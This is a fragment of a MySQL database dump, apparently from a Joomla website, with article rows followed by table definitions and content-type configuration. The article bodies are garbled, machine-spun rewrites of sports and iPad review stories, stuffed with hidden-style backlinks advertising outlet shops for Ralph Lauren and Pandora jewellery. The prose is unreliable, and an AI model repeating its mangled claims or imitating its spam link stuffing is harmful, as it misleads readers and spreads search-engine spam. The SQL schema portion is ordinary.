mean time, goose sorensen at solera on monday night served up a blind tazo tea infused mouth watering <b><a title=\"Ralph Lauren UK Outlet\" href=\"http://www.ycol.co.uk/ralph-lauren-uk-outlet.html\">Ralph Lauren UK Outlet</a></b> dinner where diners were blindfolded.<br /><br />Not sure yet on a naked dinner.<br /><br />City internal <br /><br />Go to william matthews\' new watercolors, u s of a\'s pictorials, at her or the puppy\'s gallery at 1617 wazee st.Noel and tammy cunningham will be honored at the may 22 denver sister cities essential dinner.Salman rushdie skedded for the aspen lit competition june 22 26.May 30 is pierre wolfe day at challenges.Elway\'s summer music series starts june 11 over the railbenders and ends aug.13 with a return bridal.Tambien(With holly kylberg internet)Beat mezcal at thursday\'s eating out for life celebrity style tip off.Sez who have: \"For travel to be exquisite, one must have a great place to leave and return to, frederick s.Wilcox <br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-13 05:14:22',736,736,'2015-05-13 05:14:22','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/102FSC.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/102FSC.png\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,2,'','',1,1046,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(138,279,'DLALA','business-pages-9','<p>Howie long takes puppet form for pizza hut super bowl large <br /><br />Syers, who often performs in new york square park, crafted a marionette that looks just like fox analyst howie long in four days that allows you to shoot an ad with the former raider that will air before super bowl xlviii on sunday.It usually requires syers four to five days to build his marionettes, but he usually takes a week to refine it.He wasn\'t afforded that luxury on this project.He was called on jan.14, Got verification for the ad two days later and it was filmed last Tuesday at FOX\'s temporary Times Square studio at Duffy Square.<br /><br />The puppet is a busting image of long.Syers had to cut fabric from one of his ralph lauren suits build a mini suit for the long marionette.It was 13 degrees plus wind chill for a single and a half hour shoot.<br /><br />Syers said as you\'re long saw the puppet, long considered\"I decided to seen everything in my life.It\'s true that i have, <br /><br />May very well 7, 10:36PM <br /><br />Victor cruz chooses to be a team captain <br /><br />Victor cruz made it perfectly clear on wednesday that beyond just exciting the giants offense in 2014, the 27 year old receiver also covets another fact.He wishes to be a team captain.<br /><br />\"Absolutely, cruz said in respond to a question of by ebenezer samuel <br /><br />Would probably 7, 12:58AM <br /><br />Knight in shining armor amukamara says he was\"Treated\"Giants learned option <br /><br />The giants used the fifth year option on cornerback prince amukamara\'s contract last week.Positive thing, at the same time, because amukamara wouldn\'t have been happy if they did not.<br /><br />\"For certain relieved, amukamara said the particular giants p.<br /><br />By rob vacchiano <br /><br />May likely 6, 1:22PM <br /><br />A look at several hits and misses of jerry reese\'s seven year draft <b><a title=\"http://www.ycol.co.uk/\" href=\"http://www.ycol.co.uk\">http://www.ycol.co.uk/</a></b> record <br /><br />Jerry reese, the giants\' gm, knows that in today\'s nfl there\'s bit of time for developing players especially high draft picks.And once he makes his first, second, and third round picks in the nfl draft on thurs.And friday, he aim.<br /><br />Appear full blog <br /><br />April 29, 2:28PM <br /><br />Geno smith you should take initial first team reps at minicamp <br /><br />If geno smith had been studying marty mornhinweg talk on tuesday, he can have liked what he heard.<br /><br />Smith is headed for a quarterback competition with michael vick, and mornhinweg said tuesday that smith takes the opening shot <b><a title=\"Polo Ralph Lauren Outlet\" href=\"http://www.ycol.co.uk/ralph-lauren-uk-outlet.html\">Polo Ralph Lauren Outlet</a></b> with.<br /><br />April 26, 8:24PM <br /><br />Rex ryan on drafting a protecting lineman:\'That may well funny\' <br /><br />No one knows who the jets uses in the first round of the upcoming nfl draft, but there\'s one position that seems safe to eliminate:Preventative lineman.That\'s modern strength of the jets after the team took a defensive lineman in the first ro.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-12 03:49:32',736,736,'2015-05-12 03:49:32','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/104dalala.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/104dalala.png\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,1,'','',1,1036,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(139,280,'ALRAMZ','business-pages-10','<p>Because those ask <br /><br />The right off the bat you see when you pick up the ipad is your own silly face.You are reproduced in the shiny black screen(If it\'s not already covered in finger prints).You stare and to your abyss as it stares into you.But an adequate amount of that.I\'ll mostly put aside the ideological debate over whether the ipad is the destroyer of worlds or the changer of games.David pogue did the particular take on that, while jeff jarvis seems surprised this morning to find that the ipad is based on iphone apps and not a full computer os.Because some individuals ask, i\'ll review my actual have.<br /><br />Speed up.This can be fast, it really is instant on.And that\'s an underrated advantage.If the ipad is nearby and you like to check your e mail, just marketing, decline and tap, and you are in your e mail while the start up chime would still be chiming on a laptop.Then you\'d have to loose time waiting for your laptop\'s desktop to slowly appear, then messages about viruses and updates are you coupled to the internet yet?After that you can open an e mail program.It\'s that to feel of\"I don\'t want to use to the pc, among the best do some stuff\"That\'s the ipad\'s biggest change.It\'s more tolerable to type on the ipad that i expected, even only over the following few lying flat on a table.I was expecting it to wobble, but it i doesn\'t.I believed the angle would be bad, but all this was not.It\'s easier than cramped physical keyboard on a netbook.<br /><br />You may type standing up.When i held the tablet in family symbol mode, i should just type with my thumbs, as possibly do on an iphone.And i don\'t possess abnormally long thumbs.You would not type much this way, but who types much taking a stand anyway?Resting, you\'ll find your own beloved position.It may the knees up position demonstrated <b><a title=\"Milagrofilms\" href=\"http://www.milagrofilms.ca\">Milagrofilms</a></b> by steve jobs.I do wonder if the ipad can create a generation of children who put their feet on the coffee table.<br /><br />Updating.The ipad uses the apple apple i-Phone\'s copy paste method.It was a clever solution for touch screens and delay fine here, but it has some iphone\'s obscure limitations.Why can still not paste into an outlook web access?Unusual.Pages is a $9 piece of apple\'s iwork suite and it\'s a good start if you should do a lot of word processing.You can also buy apps to employ word or google documents.<br /><br />Assess full sizemonotasking.You can move from app to app so quickly you almost don\'t notice the lack of multi tasking.One way you can see is when you want to listen to pandora, npr or ballgames mobile while you work.If apple allows background listening besides ipod music, it would deal with nearly all multitasking complaints.Major league baseball\'s app has figured out a way to let you hear the game phone on the safari app, even when you work in any other app.Other might learn something.<br /><br />Pleased.In spite of the whiz bang demos by magazine publishers before the launch, i wasn\'t able to witness much from magazines in the app store.Popular science made the most of the ipad\'s touchscreen display, with pages that scroll up and down and sweep to and fro, while outside magazine had gorgeous photos but its layouts were static print pages that did not even seem to be sized right for the ipad screen.Marvel\'s comics app had stunning color, but it was hard to read the text and all pages and posts didn\'t zoom naturally.<br /><br />View full sizethe new york times app was a meager two not so active pages labeled editors\' choice.Usa today is earlier leader in this category.Npr, bbc and reuters had harsh apps.Ap\'s app is friendly and outstanding, with stories presented like clippings scattered all over the screen.I think i\'d rather have a more efficient list with more news per screen.<br /><br />Ibooks comes pre installed with\"Winnie all pooh\"To show off the e reader potential.You can upload free classics or buy bestsellers.The reading suffer is as good as advertised, but your eyes may need to adjust to the backlit screen, or the other way round.<br /><br />1.Apple has never been afraid to move that is a, from command lines to personal computers, and from mice and cursors to the touch pads and touch screens.Exactly what happened to the floppy disk?<br /><br />2.Apple\'s current approach can be summarized as.A core of features handled exquisitely and seamlessly, then apps for nearly devices, but some things just don\'t fully trust your fingers.Can get you an ipad app to run a computer remotely, a good pc.You might find out why a traditional main system is not well suited for your fingers.<br /><br />3.Apple still makes desktops.Apple even still makes desktop laptops.<br /><br />4.The techies are generally just lashing back at the\"This changes everything\"Ballyhoo.But don\'t they sound similar to old media?<br /><br />5.Vertical branded news sources as apps are part of a culture shift favoring the use of, but am not a savior of, news marketers.Thinking about, computers are inconvenient, the world-Wide-Web is inconvenient and some apps are handy enough to pay for.There is however one thing i noticed.The ipad is so fast inside of of itself, and its browser is so fast via internet, that all of this sweeping, zipping and zooming builds prospects.Publishers will have to sell prospective buyers that they should stop, pay <b><a title=\"Pandora Bracelets Canada\" href=\"http://www.milagrofilms.ca/bracelets-pandora.html\">Pandora Bracelets Canada</a></b> on the cost, wait for an download, and now they can check this out month\'s magazine.<br /><br />Ny teachers\' average salary tops nation, report findssyracuse man accused of raping girls, 2 furthermore 4, as wife held them down refuses to come to courtstate trooper dies from injuries a day after a tractor trailer hit his patrol carsyracuse man admits raping little girls as wife held them down, is maximum 27+ years in prison.<br /><br /></p>','',1,84,'2014-03-31 06:04:29',736,'','2015-05-08 05:10:55',736,736,'2015-05-08 05:10:55','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/105alramz.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/105alramz.png\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,'','',1,949,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''); /*!40000 ALTER TABLE `fit_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_content_frontpage` -- DROP TABLE IF EXISTS `fit_content_frontpage`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_content_frontpage` ( `content_id` int(11) NOT NULL default '0', `ordering` int(11) NOT NULL default '0', PRIMARY KEY (`content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_content_frontpage` -- LOCK TABLES `fit_content_frontpage` WRITE; /*!40000 ALTER TABLE `fit_content_frontpage` DISABLE KEYS */; INSERT INTO `fit_content_frontpage` VALUES (50,2),(70,1); /*!40000 ALTER TABLE `fit_content_frontpage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_content_rating` -- DROP TABLE IF EXISTS `fit_content_rating`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_content_rating` ( `content_id` int(11) NOT NULL default '0', `rating_sum` int(10) unsigned NOT NULL default '0', `rating_count` int(10) unsigned NOT NULL default '0', `lastip` varchar(50) NOT NULL default '', PRIMARY KEY (`content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_content_rating` -- LOCK TABLES `fit_content_rating` WRITE; /*!40000 ALTER TABLE `fit_content_rating` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_content_rating` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_content_types` -- DROP TABLE IF EXISTS `fit_content_types`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_content_types` ( `type_id` int(10) unsigned NOT NULL auto_increment, `type_title` varchar(255) NOT NULL default '', `type_alias` varchar(255) NOT NULL default '', `table` varchar(255) NOT NULL default '', `rules` text NOT NULL, `field_mappings` text NOT NULL, `router` varchar(255) NOT NULL default '', `content_history_options` varchar(5120) NOT NULL COMMENT 'JSON string for com_contenthistory options', PRIMARY KEY (`type_id`), KEY `idx_alias` (`type_alias`) ) ENGINE=InnoDB AUTO_INCREMENT=10005 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_content_types` -- LOCK TABLES `fit_content_types` WRITE; /*!40000 ALTER TABLE `fit_content_types` DISABLE KEYS */; INSERT INTO `fit_content_types` VALUES (1,'Article','com_content.article','{\"special\":{\"dbtable\":\"#__content\",\"key\":\"id\",\"type\":\"Content\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"introtext\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"attribs\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"asset_id\"}, \"special\": {\"fulltext\":\"fulltext\"}}','ContentHelperRoute::getArticleRoute','{\"formFile\":\"administrator\\/components\\/com_content\\/models\\/forms\\/article.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(2,'Weblink','com_weblinks.weblink','{\"special\":{\"dbtable\":\"#__weblinks\",\"key\":\"id\",\"type\":\"Weblink\",\"prefix\":\"WeblinksTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"url\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {}}','WeblinksHelperRoute::getWeblinkRoute','{\"formFile\":\"administrator\\/components\\/com_weblinks\\/models\\/forms\\/weblink.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"featured\",\"images\"], \"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(3,'Contact','com_contact.contact','{\"special\":{\"dbtable\":\"#__contact_details\",\"key\":\"id\",\"type\":\"Contact\",\"prefix\":\"ContactTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"address\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"image\", \"core_urls\":\"webpage\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"con_position\":\"con_position\",\"suburb\":\"suburb\",\"state\":\"state\",\"country\":\"country\",\"postcode\":\"postcode\",\"telephone\":\"telephone\",\"fax\":\"fax\",\"misc\":\"misc\",\"email_to\":\"email_to\",\"default_con\":\"default_con\",\"user_id\":\"user_id\",\"mobile\":\"mobile\",\"sortname1\":\"sortname1\",\"sortname2\":\"sortname2\",\"sortname3\":\"sortname3\"}}','ContactHelperRoute::getContactRoute','{\"formFile\":\"administrator\\/components\\/com_contact\\/models\\/forms\\/contact.xml\",\"hideFields\":[\"default_con\",\"checked_out\",\"checked_out_time\",\"version\",\"xreference\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[ {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ] }'),(4,'Newsfeed','com_newsfeeds.newsfeed','{\"special\":{\"dbtable\":\"#__newsfeeds\",\"key\":\"id\",\"type\":\"Newsfeed\",\"prefix\":\"NewsfeedsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"numarticles\":\"numarticles\",\"cache_time\":\"cache_time\",\"rtl\":\"rtl\"}}','NewsfeedsHelperRoute::getNewsfeedRoute','{\"formFile\":\"administrator\\/components\\/com_newsfeeds\\/models\\/forms\\/newsfeed.xml\",\"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(5,'User','com_users.user','{\"special\":{\"dbtable\":\"#__users\",\"key\":\"id\",\"type\":\"User\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"null\",\"core_alias\":\"username\",\"core_created_time\":\"registerdate\",\"core_modified_time\":\"lastvisitDate\",\"core_body\":\"null\", \"core_hits\":\"null\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"access\":\"null\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"null\", \"core_language\":\"null\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"null\", \"core_ordering\":\"null\", \"core_metakey\":\"null\", \"core_metadesc\":\"null\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {}}','UsersHelperRoute::getUserRoute',''),(6,'Article Category','com_content.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContentHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(7,'Contact Category','com_contact.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContactHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(8,'Newsfeeds Category','com_newsfeeds.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": 